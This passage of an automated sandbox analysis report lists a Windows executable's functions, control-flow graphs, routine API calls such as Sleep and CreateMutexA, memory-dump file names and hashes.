                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: d62e0bec3b9972e65c871457bb171e75a32e307546b6e9b27a70e59ea04c7cb3
                                                                                                                                                                    • Instruction ID: f6443f80309d56b42403b3445851d72d006be446beba572a0faa61fc04022281
                                                                                                                                                                    • Opcode Fuzzy Hash: d62e0bec3b9972e65c871457bb171e75a32e307546b6e9b27a70e59ea04c7cb3
                                                                                                                                                                    • Instruction Fuzzy Hash: 3B216A71B443018AFB24776ADC9ABEDB251EF81310F24481AE448DA6C1DA7E8881FA53
                                                                                                                                                                    Function 00FBA34F Relevance: 3.1, APIs: 2, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 477 fba34f-fba35b 478 fba35d-fba36b 477->478 479 fba371-fba39a call fcd663 477->479 478->479 480 fba93a 478->480 485 fba3c8-fba916 call fc80c0 479->485 486 fba39c-fba3a8 479->486 483 fba953-fba994 Sleep CreateMutexA 480->483 484 fba93a call fe6c6a 480->484 491 fba9a7-fba9a8 483->491 492 fba996-fba998 483->492 484->483 487 fba3aa-fba3b8 486->487 488 fba3be-fba3c5 call fcd663 486->488 487->480 487->488 488->485 492->491 495 fba99a-fba9a5 492->495 495->491
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00FBA963
                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,01013254), ref: 00FBA981
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateMutexSleep
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1464230837-0
                                                                                                                                                                    • Opcode ID: 2a72b554f1de0071d786eb4164d4fa31674e32f34afb6c6f25d35a0d33b0df34
                                                                                                                                                                    • Instruction ID: e876ed329fb29cb9463acc11dbdba8035e86835ffd2a3091ecd64a556eab52aa
                                                                                                                                                                    • Opcode Fuzzy Hash: 2a72b554f1de0071d786eb4164d4fa31674e32f34afb6c6f25d35a0d33b0df34
                                                                                                                                                                    • Instruction Fuzzy Hash: 37219E317402019BEB18AB6DEC89BECB7A1EFD1320F24421DE404DB6D4D77A4580EB12
                                                                                                                                                                    Function 00FB7D30 Relevance: 1.9, APIs: 1, Instructions: 426COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 536 fb7d30-fb7db2 call fe40f0 540 fb7db8-fb7de0 call fc7a00 call fb5c10 536->540 541 fb8356-fb8373 call fccff1 536->541 548 fb7de2 540->548 549 fb7de4-fb7e06 call fc7a00 call fb5c10 540->549 548->549 554 fb7e0a-fb7e23 549->554 555 fb7e08 549->555 558 fb7e25-fb7e34 554->558 559 fb7e54-fb7e7f 554->559 555->554 560 fb7e4a-fb7e51 call fcd663 558->560 561 fb7e36-fb7e44 558->561 562 fb7e81-fb7e90 559->562 563 fb7eb0-fb7ed1 559->563 560->559 561->560 566 fb8374 call fe6c6a 561->566 568 fb7e92-fb7ea0 562->568 569 fb7ea6-fb7ead call fcd663 562->569 564 fb7ed3-fb7ed5 GetNativeSystemInfo 563->564 565 fb7ed7-fb7edc 563->565 571 fb7edd-fb7ee6 564->571 565->571 578 fb8379-fb837f call fe6c6a 566->578 568->566 568->569 569->563 576 fb7ee8-fb7eef 571->576 577 fb7f04-fb7f07 571->577 579 fb8351 576->579 580 fb7ef5-fb7eff 576->580 581 fb7f0d-fb7f16 577->581 582 fb82f7-fb82fa 577->582 579->541 584 fb834c 580->584 585 fb7f29-fb7f2c 581->585 586 fb7f18-fb7f24 581->586 582->579 587 fb82fc-fb8305 582->587 584->579 589 fb7f32-fb7f39 585->589 590 fb82d4-fb82d6 585->590 586->584 591 fb832c-fb832f 587->591 592 fb8307-fb830b 587->592 597 fb8019-fb82bd call fc7a00 call fb5c10 call fc7a00 call fb5c10 call fb5d50 call fc7a00 call fb5c10 call fb5730 call fc7a00 call fb5c10 call fc7a00 call fb5c10 call fb5d50 call fc7a00 call fb5c10 call fb5730 call fc7a00 call fb5c10 call fc7a00 call fb5c10 call fb5d50 call fc7a00 call fb5c10 call fb5730 call fc7a00 call fb5c10 call fc7a00 call fb5c10 call fb5d50 call fc7a00 call fb5c10 call fb5730 589->597 598 fb7f3f-fb7f9b call fc7a00 call fb5c10 call fc7a00 call fb5c10 call fb5d50 589->598 595 fb82d8-fb82e2 590->595 596 fb82e4-fb82e7 590->596 593 fb833d-fb8349 591->593 594 fb8331-fb833b 591->594 599 fb830d-fb8312 592->599 600 fb8320-fb832a 592->600 593->584 594->579 595->584 596->579 604 fb82e9-fb82f5 596->604 635 fb82c3-fb82cc 597->635 621 fb7fa0-fb7fa7 598->621 599->600 602 fb8314-fb831e 599->602 600->579 602->579 604->584 624 fb7fab-fb7fcb call fe8bbe 621->624 625 fb7fa9 621->625 631 fb7fcd-fb7fdc 624->631 632 fb8002-fb8004 624->632 625->624 636 fb7fde-fb7fec 631->636 637 fb7ff2-fb7fff call fcd663 631->637 634 fb800a-fb8014 632->634 632->635 634->635 635->582 640 fb82ce 635->640 636->578 636->637 637->632 640->590
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FB7ED3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoNativeSystem
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1721193555-0
                                                                                                                                                                    • Opcode ID: 635e36db23f0a75e84542c7859c1f04c46799f78f54ddb5da49512fdb0628ab5
                                                                                                                                                                    • Instruction ID: 5b8213361199837e39c6c233ddda4d4ef56d4e56fe80c8db27c840d154dfcd07
                                                                                                                                                                    • Opcode Fuzzy Hash: 635e36db23f0a75e84542c7859c1f04c46799f78f54ddb5da49512fdb0628ab5
                                                                                                                                                                    • Instruction Fuzzy Hash: D9E12971E002449BCF25BB2ACD477DD7A62AB81720F94429CE4556B3C2DB3D5E81AFC2
                                                                                                                                                                    Function 00FED82F Relevance: 1.5, APIs: 1, Instructions: 40memoryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 835 fed82f-fed83a 836 fed83c-fed846 835->836 837 fed848-fed84e 835->837 836->837 838 fed87c-fed887 call fe75f6 836->838 839 fed867-fed878 RtlAllocateHeap 837->839 840 fed850-fed851 837->840 845 fed889-fed88b 838->845 841 fed87a 839->841 842 fed853-fed85a call fe9dc0 839->842 840->839 841->845 842->838 848 fed85c-fed865 call fe8e36 842->848 848->838 848->839
                                                                                                                                                                    APIs
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00FEA813,00000001,00000364,00000006,000000FF,?,00FEEE3F,?,00000004,00000000,?,?), ref: 00FED870
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172859499.0000000001012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172945697.0000000001019000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172965613.000000000101B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2172986144.0000000001025000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173006327.0000000001026000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173031775.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173154677.000000000117D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173177073.0000000001180000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000118E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173199376.000000000119C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173254094.00000000011A0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173276054.00000000011A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173295281.00000000011A2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173314298.00000000011A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173336144.00000000011AE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173354350.00000000011AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173379807.00000000011B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173400052.00000000011B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173426304.00000000011CC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173447328.00000000011CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173476322.00000000011CF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173500802.00000000011D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173521014.00000000011D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173540689.00000000011E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173570847.00000000011FE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173591657.00000000011FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173615771.0000000001200000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173640446.0000000001207000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173661569.0000000001208000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173682911.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173703949.0000000001219000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173723604.000000000121B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173745809.000000000121C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173764733.000000000121F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173810269.0000000001228000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173832693.0000000001230000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173863808.0000000001237000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173885011.0000000001239000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2173917976.0000000001269000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.000000000126A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174131778.0000000001275000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174181867.00000000012A1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174203476.00000000012A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174223114.00000000012A4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174244742.00000000012A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174267174.00000000012AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174295831.00000000012B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2174319547.00000000012B9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                    • Opcode ID: c5f7664d1a6c9a09a2fc5764095ba3101005ddac0c9f7c937f974d3674132bb7
                                                                                                                                                                    • Instruction ID: 2b6365c7a7e6c2c6326801c23f1161dfec8d35524664dc4d95467ded7413330e
                                                                                                                                                                    • Opcode Fuzzy Hash: c5f7664d1a6c9a09a2fc5764095ba3101005ddac0c9f7c937f974d3674132bb7
                                                                                                                                                                    • Instruction Fuzzy Hash: 9BF02E32A462F466EB313A739C01B5B3759DF41770B188021FC48E7981DE25EE01B2E1
                                                                                                                                                                    Function 00FB87B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,00FBDA1D,?,?,?,?), ref: 00FB87B9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2172833223.0000000000FB0000.00000004.00000001.01000000.00000003.sdmpDownload File
